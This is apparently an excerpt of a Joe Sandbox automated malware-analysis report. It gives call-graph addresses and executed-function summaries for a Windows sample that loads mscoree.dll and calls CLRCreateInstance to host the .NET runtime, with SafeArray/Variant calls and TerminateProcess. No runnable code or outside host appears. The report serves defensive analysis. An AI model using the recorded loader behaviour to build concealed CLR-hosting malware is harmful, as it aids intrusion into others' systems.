6cf7e4a5 60096->60097 60098 6cfb9bb5 77 API calls 60097->60098 60099 6cf7e4ac 60098->60099 60100 6cf65050 77 API calls 60099->60100 60101 6cf7e4c6 60100->60101 60102 6cf7e4d3 60101->60102 60160 6cfb919e 67 API calls 3 library calls 60101->60160 60104 6cfb9bb5 77 API calls 60102->60104 60105 6cf7e4e3 60104->60105 60106 6cf65050 77 API calls 60105->60106 60107 6cf7e4fd 60106->60107 60108 6cfb9bb5 77 API calls 60107->60108 60109 6cf7e504 60108->60109 60110 6cf65050 77 API calls 60109->60110 60111 6cf7e51e 60110->60111 60112 6cfb9bb5 77 API calls 60111->60112 60113 6cf7e525 60112->60113 60114 6cf65050 77 API calls 60113->60114 60115 6cf7e53f 60114->60115 60116 6cf616b0 327 API calls 60115->60116 60116->60117 60117->60072 60119 6cfb9bb5 77 API calls 60118->60119 60120 6cf82013 60119->60120 60121 6cf82020 60120->60121 60122 6cf821f3 60120->60122 60161 6cf86480 60121->60161 60195 6cfb9533 66 API calls std::exception::_Copy_str 60122->60195 60125 6cf8220b 60196 6cfbac75 RaiseException 60125->60196 60126 6cf8206c 60177 6cf535f0 60126->60177 60128 6cf82226 60130 6cf8216e 60188 6cf82300 60130->60188 60132 6cf82194 60133 6cf82300 77 API calls 60132->60133 60134 6cf821a0 60133->60134 60135 6cf82300 77 API calls 60134->60135 60136 6cf821ad 60135->60136 60137 6cf82300 77 API calls 60136->60137 60138 6cf821ba 60137->60138 60139 6cf82300 77 API calls 60138->60139 60140 6cf821c6 60139->60140 60141 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 60140->60141 60142 6cf821ef 60141->60142 60142->60064 60144 6cfb9bb5 77 API calls 60143->60144 60145 6cf7eb17 60144->60145 60146 6cf7eb22 60145->60146 60147 6cf7f4c9 60145->60147 60241 6cfba25a GetSystemTimeAsFileTime 60146->60241 60249 6cfb9533 66 API calls std::exception::_Copy_str 60147->60249 60149 6cf7f4dc 60250 6cfbac75 RaiseException 60149->60250 60152 6cf7f4f1 60153 6cf7eb5b 60243 6cfb9dfa 60153->60243 60158->60079 60159->60083 60160->60102 60162 6cf8655d 60161->60162 60165 6cf864c8 60161->60165 60163 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 60162->60163 60164 6cf8657d 60163->60164 60164->60126 60165->60162 60166 6cf8651d 60165->60166 60197 6cf52f40 77 API calls 60165->60197 60166->60162 60200 6cf52f40 77 API calls 60166->60200 60169 6cf864f5 60198 6cf86400 77 API calls std::tr1::_Xweak 60169->60198 60170 6cf86535 60201 6cf86400 77 API calls std::tr1::_Xweak 60170->60201 60173 6cf8654e 60202 6cfbac75 RaiseException 60173->60202 60174 6cf8650e 60199 6cfbac75 RaiseException 60174->60199 60203 6cfa6d40 60177->60203 60180 6cf86480 77 API calls 60181 6cf5364c 60180->60181 60210 6cf54b30 60181->60210 60183 6cf536a7 60214 6cf886e0 60183->60214 60185 6cf536bc 60186 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 60185->60186 60187 6cf53701 60186->60187 60187->60130 60189 6cf8231d 60188->60189 60190 6cf823aa 60189->60190 60191 6cfb9bb5 77 API calls 60189->60191 60190->60132 60193 6cf82331 60191->60193 60192 6cf82374 collate 60192->60132 60193->60192 60240 6cf82480 77 API calls 60193->60240 60195->60125 60196->60128 60197->60169 60198->60174 60199->60166 60200->60170 60201->60173 60202->60162 60204 6cf86480 77 API calls 60203->60204 60205 6cfa6d7f 60204->60205 60222 6cf88d80 60205->60222 60208 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 60209 6cf53630 60208->60209 60209->60180 60211 6cf54b65 60210->60211 60232 6cf54fa0 60211->60232 60213 6cf54b7f 60213->60183 60215 6cf88728 60214->60215 60216 6cf88765 60215->60216 60238 6cf87cd0 77 API calls 3 library calls 60215->60238 60217 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 60216->60217 60218 6cf8878a 60217->60218 60218->60185 60220 6cf88756 60239 6cfbac75 RaiseException 60220->60239 60223 6cfb9d66 _malloc 66 API calls 60222->60223 60227 6cf88d8f 60223->60227 60224 6cf88dbb 60224->60208 60225 6cfb91f6 70 API calls 60225->60227 60226 6cf88dc1 std::exception::exception 60231 6cfbac75 RaiseException 60226->60231 60227->60224 60227->60225 60227->60226 60230 6cfb9d66 _malloc 66 API calls 60227->60230 60229 6cf88df0 60230->60227 60231->60229 60233 6cfb9bb5 77 API calls 60232->60233 60234 6cf54fcf 60233->60234 60235 6cf54ff1 60234->60235 60237 6cf55050 81 API calls _memcpy_s 60234->60237 60235->60213 60237->60235 60238->60220 60239->60216 60240->60190 60242 6cfba28a __aulldiv 60241->60242 60242->60153 60251 6cfbeae6 60243->60251 60246 6cfb9e0c 60247 6cfbeae6 __getptd 66 API calls 60246->60247 60248 6cf7eb69 60247->60248 60248->60078 60249->60149 60250->60152 60256 6cfbea6d GetLastError 60251->60256 60253 6cfbeaee 60254 6cf7eb61 60253->60254 60271 6cfbd4f6 66 API calls 3 library calls 60253->60271 60254->60246 60257 6cfbe948 ___set_flsgetvalue 3 API calls 60256->60257 60258 6cfbea84 60257->60258 60259 6cfbeada SetLastError 60258->60259 60260 6cfbea8c 60258->60260 60259->60253 60272 6cfbcb28 66 API calls __calloc_crt 60260->60272 60262 6cfbea98 60262->60259 60263 6cfbeaa0 DecodePointer 60262->60263 60264 6cfbeab5 60263->60264 60265 6cfbeab9 60264->60265 60266 6cfbead1 60264->60266 60273 6cfbe9b9 66 API calls 4 library calls 60265->60273 60274 6cfb9d2c 66 API calls 2 library calls 60266->60274 60269 6cfbead7 60269->60259 60270 6cfbeac1 GetCurrentThreadId 60270->60259 60272->60262 60273->60270 60274->60269 59877 6cfba510 59880 6cfbfe93 59877->59880 59879 6cfba515 59881 6cfbfeb8 59880->59881 59882 6cfbfec5 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 59880->59882 59881->59882 59883 6cfbfebc 59881->59883 59884 6cfbff04 59882->59884 59883->59879 59884->59883

                                                          Executed Functions

                                                          Function 6CF7B6B0 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 720 6cf7b6b0-6cf7b758 VariantInit * 2 721 6cf7b764-6cf7b769 720->721 722 6cf7b75a-6cf7b75f call 6cfcc1e0 720->722 724 6cf7b773-6cf7b784 721->724 725 6cf7b76b-6cf7b770 721->725 722->721 727 6cf7be96-6cf7beb4 VariantClear * 2 724->727 728 6cf7b78a-6cf7b791 724->728 725->724 731 6cf7beb6-6cf7bebb 727->731 732 6cf7bebe-6cf7beca 727->732 729 6cf7b793-6cf7b798 728->729 730 6cf7b7b9-6cf7b7e2 SafeArrayCreateVector 728->730 735 6cf7b7a2-6cf7b7b3 729->735 736 6cf7b79a-6cf7b79f 729->736 737 6cf7b7e4-6cf7b7e7 730->737 738 6cf7b7ec-6cf7b809 SafeArrayPutElement VariantClear 730->738 731->732 733 6cf7bed4-6cf7bef2 call 6cfb948b 732->733 734 6cf7becc-6cf7bed1 732->734 734->733 735->727 735->730 736->735 737->738 740 6cf7be85-6cf7be8d 738->740 741 6cf7b80f-6cf7b81d 738->741 740->727 744 6cf7be8f-6cf7be90 SafeArrayDestroy 740->744 745 6cf7b81f-6cf7b824 call 6cfcc1e0 741->745 746 6cf7b829-6cf7b841 741->746 744->727 745->746 746->740 749 6cf7b847-6cf7b853 746->749 749->740 750 6cf7b859-6cf7b85e 749->750 750->740 751 6cf7b864-6cf7b86b 750->751 752 6cf7b913-6cf7b917 751->752 753 6cf7b871-6cf7b87e 751->753 754 6cf7b921-6cf7b941 call 6cf6dcd0 752->754 755 6cf7b919-6cf7b91b 752->755 756 6cf7b880-6cf7b882 753->756 757 6cf7b888-6cf7b8f8 call 6cf7dbc0 call 6cf75790 call 6cf7c850 753->757 754->740 762 6cf7b947-6cf7b964 call 6cf6dcd0 754->762 755->740 755->754 756->740 756->757 772 6cf7b904-6cf7b90e call 6cf7e800 757->772 773 6cf7b8fa-6cf7b8ff call 6cf7e800 757->773 762->740 768 6cf7b96a-6cf7b96d 762->768 770 6cf7b993-6cf7b9bf 768->770 771 6cf7b96f-6cf7b98d call 6cf6dcd0 768->771 774 6cf7b9c1-6cf7b9c6 call 6cfcc1e0 770->774 775 6cf7b9cb-6cf7ba1d VariantClear 770->775 771->740 771->770 772->770 783 6cf7be83 773->783 774->775 775->740 785 6cf7ba23-6cf7ba31 775->785 783->740 786 6cf7ba33-6cf7ba38 call 6cfcc1e0 785->786 787 6cf7ba3d-6cf7ba8b 785->787 786->787 787->740 790 6cf7ba91-6cf7ba95 787->790 790->740 791 6cf7ba9b-6cf7baa7 call 6cfb9bb5 790->791 794 6cf7bab6 791->794 795 6cf7baa9-6cf7bab4 791->795 796 6cf7bab8-6cf7bacc call 6cf7bf00 794->796 795->796 796->740 799 6cf7bad2-6cf7bada 796->799 800 6cf7baf3-6cf7baf8 799->800 801 6cf7badc-6cf7baed call 6cf747d0 799->801 803 6cf7bb11-6cf7bb2e call 6cf749b0 800->803 804 6cf7bafa-6cf7bb0b call 6cf747d0 800->804 801->740 801->800 803->740 810 6cf7bb34-6cf7bb4b call 6cf7cd20 803->810 804->740 804->803 810->740 813 6cf7bb51-6cf7bb8e call 6cf75790 call 6cf74170 810->813 818 6cf7bb90-6cf7bb95 call 6cf7e800 813->818 819 6cf7bb9a-6cf7bba8 call 6cf7e800 813->819 818->783 824 6cf7bca2 819->824 825 6cf7bbae-6cf7bbc0 819->825 826 6cf7bca8-6cf7bcae 824->826 825->824 827 6cf7bbc6-6cf7bc5b call 6cf6c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6cf7db10 825->827 829 6cf7bcb4-6cf7bcc6 826->829 830 6cf7bd78-6cf7bdc8 826->830 839 6cf7bc60-6cf7bc75 827->839 829->830 832 6cf7bccc-6cf7bd76 call 6cf6c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6cf7db10 VariantClear * 2 829->832 830->783 840 6cf7bdce-6cf7bdd7 830->840 832->830 843 6cf7bc77-6cf7bc8d 839->843 844 6cf7bc90-6cf7bca0 VariantClear * 2 839->844 840->783 845 6cf7bddd-6cf7bde4 840->845 843->844 844->826 845->783 847 6cf7bdea-6cf7be03 call 6cfb9bb5 845->847 850 6cf7be05-6cf7be10 call 6cf6c4a0 847->850 851 6cf7be12 847->851 852 6cf7be14-6cf7be3c 850->852 851->852 854 6cf7be7f 852->854 855 6cf7be3e-6cf7be50 852->855 854->783 855->854 857 6cf7be52-6cf7be65 call 6cfb9bb5 855->857 860 6cf7be67-6cf7be6f call 6cf6c4a0 857->860 861 6cf7be71 857->861 863 6cf7be73-6cf7be7c 860->863 861->863 863->854
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7B73F
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7B748
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7B7BE
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7B7F5
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7B801
                                                            • Part of subcall function 6CF7C850: VariantInit.OLEAUT32(?), ref: 6CF7C88F
                                                            • Part of subcall function 6CF7C850: VariantInit.OLEAUT32(?), ref: 6CF7C895
                                                            • Part of subcall function 6CF7C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7C8A0
                                                            • Part of subcall function 6CF7C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF7C8D5
                                                            • Part of subcall function 6CF7C850: VariantClear.OLEAUT32(?), ref: 6CF7C8E1
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7BA15
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7BE90
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7BEA3
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7BEA9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                          • String ID:
                                                          • API String ID: 2012514194-0
                                                          • Opcode ID: 50c105c05cd0bb4f3fb876db84f2b24923703b2428137cd30f9faf493a334fa4
                                                          • Instruction ID: 67534b9047a1a5646f60964adc9cb2487856010a017c872acdd8a469b32aa441
                                                          • Opcode Fuzzy Hash: 50c105c05cd0bb4f3fb876db84f2b24923703b2428137cd30f9faf493a334fa4
                                                          • Instruction Fuzzy Hash: 30525C71D00218DFDB10DFA8D884BDEBBB5BF49304F25859AE519AB750DB30A945CFA0
                                                          Function 062B0EB3 Relevance: 29.6, Strings: 23, Instructions: 800COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 865 62b0eb3-62b0ece 867 62b19bb-62b19bf 865->867 868 62b0ed4-62b0ee6 865->868 869 62b19d2-62b1a58 867->869 870 62b19c1-62b19cd 867->870 874 62b0ee8-62b0f0a 868->874 875 62b0f15-62b0f36 868->875 887 62b1a5a-62b1a66 869->887 888 62b1a82 869->888 871 62b1ee8-62b1ef5 870->871 879 62b0f3c-62b0f52 874->879 875->879 880 62b0f5e-62b1042 879->880 881 62b0f54-62b0f58 879->881 904 62b106c 880->904 905 62b1044-62b1050 880->905 881->867 881->880 889 62b1a68-62b1a6e 887->889 890 62b1a70-62b1a76 887->890 891 62b1a88-62b1acd 888->891 893 62b1a80 889->893 890->893 1021 62b1ad0 call 62e2bc8 891->1021 1022 62b1ad0 call 62e2bd0 891->1022 893->891 896 62b1ad2-62b1adf 898 62b1ae1 896->898 899 62b1ae5-62b1b0e 896->899 898->899 902 62b1c40-62b1c47 899->902 903 62b1b14-62b1b40 899->903 909 62b1d4f-62b1db0 902->909 910 62b1c4d-62b1d4c 902->910 913 62b1b42 903->913 914 62b1b47-62b1b82 903->914 908 62b1072-62b1124 904->908 906 62b105a-62b1060 905->906 907 62b1052-62b1058 905->907 911 62b106a 906->911 907->911 929 62b114e 908->929 930 62b1126-62b1132 908->930 909->871 910->909 911->908 913->914 914->902 932 62b1154-62b116f 929->932 933 62b113c-62b1142 930->933 934 62b1134-62b113a 930->934 938 62b1199 932->938 939 62b1171-62b117d 932->939 935 62b114c 933->935 934->935 935->932 943 62b119f-62b11bd 938->943 941 62b117f-62b1185 939->941 942 62b1187-62b118d 939->942 945 62b1197 941->945 942->945 947 62b12db-62b13bf 943->947 948 62b11c3-62b12c2 943->948 945->943 962 62b13e9 947->962 963 62b13c1-62b13cd 947->963 948->947 966 62b13ef-62b1444 962->966 964 62b13cf-62b13d5 963->964 965 62b13d7-62b13dd 963->965 968 62b13e7 964->968 965->968 974 62b144a-62b1549 966->974 975 62b1562-62b1638 966->975 968->966 974->975 975->867 984 62b163e-62b1647 975->984 986 62b1649-62b164c 984->986 987 62b1652-62b1751 984->987 986->987 988 62b176a-62b1781 986->988 987->988 988->867 992 62b1787-62b1898 988->992 1010 62b189a-62b189d 992->1010 1011 62b18a3-62b19a2 992->1011 1010->867 1010->1011 1011->867 1021->896 1022->896
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
                                                          • API String ID: 0-3728642687
                                                          • Opcode ID: c80ef87238a1fac240b62e04230702f815e0f50be1951f6bfd2f444744c92f62
                                                          • Instruction ID: ac81d7b9546e46e90a1a758f3ddb21b75a7b4eb31cbc7cc9a02fd4f38cb36daf
                                                          • Opcode Fuzzy Hash: c80ef87238a1fac240b62e04230702f815e0f50be1951f6bfd2f444744c92f62
                                                          • Instruction Fuzzy Hash: 9582A374E402298FDBA4DF68C998BD9B7B1AF48300F1481E9D50DAB365DB34AE85CF50
                                                          Function 6CF6B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1442 6cf6b6c0-6cf6b715 GetModuleHandleW 1443 6cf6b717-6cf6b724 LoadLibraryW 1442->1443 1444 6cf6b72a-6cf6b738 GetProcAddress 1442->1444 1443->1444 1445 6cf6b94c-6cf6b954 1443->1445 1444->1445 1446 6cf6b73e-6cf6b750 1444->1446 1447 6cf6b956-6cf6b95b 1445->1447 1448 6cf6b95e-6cf6b96a 1445->1448 1446->1445 1452 6cf6b756-6cf6b771 1446->1452 1447->1448 1450 6cf6b974-6cf6b98f call 6cfb948b 1448->1450 1451 6cf6b96c-6cf6b971 1448->1451 1451->1450 1452->1445 1456 6cf6b777-6cf6b788 1452->1456 1456->1445 1458 6cf6b78e-6cf6b791 1456->1458 1458->1445 1459 6cf6b797-6cf6b7b2 1458->1459 1459->1445 1461 6cf6b7b8-6cf6b7c5 1459->1461 1461->1445 1463 6cf6b7cb-6cf6b7d0 1461->1463 1464 6cf6b7d2-6cf6b7d7 1463->1464 1465 6cf6b7da-6cf6b7e7 1463->1465 1464->1465 1466 6cf6b7ec-6cf6b7ee 1465->1466 1466->1445 1467 6cf6b7f4-6cf6b7f9 1466->1467 1468 6cf6b805-6cf6b80a 1467->1468 1469 6cf6b7fb-6cf6b800 call 6cfcc1e0 1467->1469 1471 6cf6b814-6cf6b829 1468->1471 1472 6cf6b80c-6cf6b811 1468->1472 1469->1468 1471->1445 1474 6cf6b82f-6cf6b849 1471->1474 1472->1471 1475 6cf6b850-6cf6b85b 1474->1475 1475->1475 1476 6cf6b85d-6cf6b8a4 call 6cfba116 GetModuleHandleW 1475->1476 1476->1445 1479 6cf6b8aa-6cf6b8c1 1476->1479 1480 6cf6b8c5-6cf6b8d0 1479->1480 1480->1480 1481 6cf6b8d2-6cf6b8f0 GetProcAddress 1480->1481 1481->1445 1482 6cf6b8f2-6cf6b8ff call 6cf55340 1481->1482 1486 6cf6b900-6cf6b905 1482->1486 1486->1486 1487 6cf6b907-6cf6b90d 1486->1487 1487->1486 1488 6cf6b90f-6cf6b912 1487->1488 1489 6cf6b914-6cf6b929 1488->1489 1490 6cf6b93a 1488->1490 1491 6cf6b931-6cf6b938 1489->1491 1492 6cf6b92b-6cf6b92e 1489->1492 1493 6cf6b93d-6cf6b948 call 6cf6ad80 1490->1493 1491->1493 1492->1491 1493->1445
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,CA0C7769), ref: 6CF6B711
                                                          • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CF6B71C
                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CF6B730
                                                          • __cftoe.LIBCMT ref: 6CF6B870
                                                          • GetModuleHandleW.KERNEL32(?), ref: 6CF6B88B
                                                          • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CF6B8D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                                          • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                                          • API String ID: 1275574042-506955582
                                                          • Opcode ID: 9ddad67a7670923aaacde98d3288f63fb0563e62c0e1ce84e653da30b9ce44e3
                                                          • Instruction ID: d30c4bc22160ce764f3b4e5e3f028937e2c7540548aba5f34ae208bc1a676a39
                                                          • Opcode Fuzzy Hash: 9ddad67a7670923aaacde98d3288f63fb0563e62c0e1ce84e653da30b9ce44e3
                                                          • Instruction Fuzzy Hash: 34919071D042499FCB04DFE9C88099EBBB5FF49314F248A6CE11AEBB50D730A90ADB54
                                                          Function 033931F0 Relevance: 7.1, Strings: 5, Instructions: 833COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                          • API String ID: 0-3486158592
                                                          • Opcode ID: 812e402c2ce2aeda76871baf3539de5af1203e02f9a96c11bb2ae19262ddf090
                                                          • Instruction ID: 92ad12299b8a23b19bf5114d6d1595a9c758074134d56e3a5aeb25220a03bb35
                                                          • Opcode Fuzzy Hash: 812e402c2ce2aeda76871baf3539de5af1203e02f9a96c11bb2ae19262ddf090
                                                          • Instruction Fuzzy Hash: 76624DB9B00115DFDB18DF69C8D4AAEB7B6BF88320B15816AE815DB364DB31DC41CB90
                                                          Function 03390A50 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xbq$$^q
                                                          • API String ID: 0-1593437937
                                                          • Opcode ID: 2fa4043cf54acf0d03686b03e394af8dac3fd6018400d5db21837014b1fb62ef
                                                          • Instruction ID: 9e9c060edc4e74fae07ff269a7d2a39147fe2c19b32c43de1e69066aed70b22f
                                                          • Opcode Fuzzy Hash: 2fa4043cf54acf0d03686b03e394af8dac3fd6018400d5db21837014b1fb62ef
                                                          • Instruction Fuzzy Hash: A3816474B00218CBDF1CEF79999467E7ABBBFC8710B05852AD44AE728CDE3498428795
                                                          Function 033962C6 Relevance: 1.8, Strings: 1, Instructions: 561COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D
                                                          • API String ID: 0-2746444292
                                                          • Opcode ID: 8309c4685cee0d14724f219de15f1bf103e5246860fb180bc3ae99635e71bd55
                                                          • Instruction ID: 0656b146194ffe874b58910b887ec4d29786242fa3ff40da776a8c855e6d68ac
                                                          • Opcode Fuzzy Hash: 8309c4685cee0d14724f219de15f1bf103e5246860fb180bc3ae99635e71bd55
                                                          • Instruction Fuzzy Hash: 4552C974A01229CFDB54DF68C998A9DB7B6FF89300F1081D9D509A73A5CB35AE81CF90
                                                          Function 062E3A7B Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNELBASE(?,?), ref: 062E3B09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: ProcessTerminate
                                                          • String ID:
                                                          • API String ID: 560597551-0
                                                          • Opcode ID: 1bbec0de14888ae7edaa0616d03a3210af7c491279e334500ca98049fa601687
                                                          • Instruction ID: fbf818859ec804f08c2d000a53602625b77e17f4c17e6f7e80822acc85733db5
                                                          • Opcode Fuzzy Hash: 1bbec0de14888ae7edaa0616d03a3210af7c491279e334500ca98049fa601687
                                                          • Instruction Fuzzy Hash: 6221ACB5D012189FDB10CFA9D584ADEFBF0EB49320F24906AE819B7310C734A945CF64
                                                          Function 062E3A80 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNELBASE(?,?), ref: 062E3B09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: ProcessTerminate
                                                          • String ID:
                                                          • API String ID: 560597551-0
                                                          • Opcode ID: f50b294a5ac008ea1c928d1227153393248c31a255929aa98020848e83cfd88f
                                                          • Instruction ID: ce4a0e45b05d0039e5229b841607053904171aed87865b1bf8f04ab112f1f902
                                                          • Opcode Fuzzy Hash: f50b294a5ac008ea1c928d1227153393248c31a255929aa98020848e83cfd88f
                                                          • Instruction Fuzzy Hash: E721AAB5D012189FCB10CFA9D584ADEFBF0AB49320F24906AE819B7320C734A945CFA4
                                                          Function 0339ABD0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8cq
                                                          • API String ID: 0-304758316
                                                          • Opcode ID: 18a6106c08c09dc33b75b4f8581688e774eebe4ae99daeb831fe1116401839a8
                                                          • Instruction ID: 03f6b6badd996a7c58f5402900ccf0f6ebd8c4155c4d50327058062efdbc8dea
                                                          • Opcode Fuzzy Hash: 18a6106c08c09dc33b75b4f8581688e774eebe4ae99daeb831fe1116401839a8
                                                          • Instruction Fuzzy Hash: 9E311575D41208AFDB04CFA8D880AEEFBF5FF49310F10906AE811B7260DB719A05CB95
                                                          Function 0339ABD8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8cq
                                                          • API String ID: 0-304758316
                                                          • Opcode ID: d24fd638937d7ddac10d8f64d11f11431914ec5704394cc0bccfaf0bc5df2640
                                                          • Instruction ID: de2dc99f3af5929212731ce34d42d559aee87dbe10f8a8d67b42a8018d2003df
                                                          • Opcode Fuzzy Hash: d24fd638937d7ddac10d8f64d11f11431914ec5704394cc0bccfaf0bc5df2640
                                                          • Instruction Fuzzy Hash: 5A31E475D41208AFDB04CFA8D480AEEBBF5FF49310F10906AE915B7260DB719A05CB95
                                                          Function 062B26F8 Relevance: .5, Instructions: 481COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
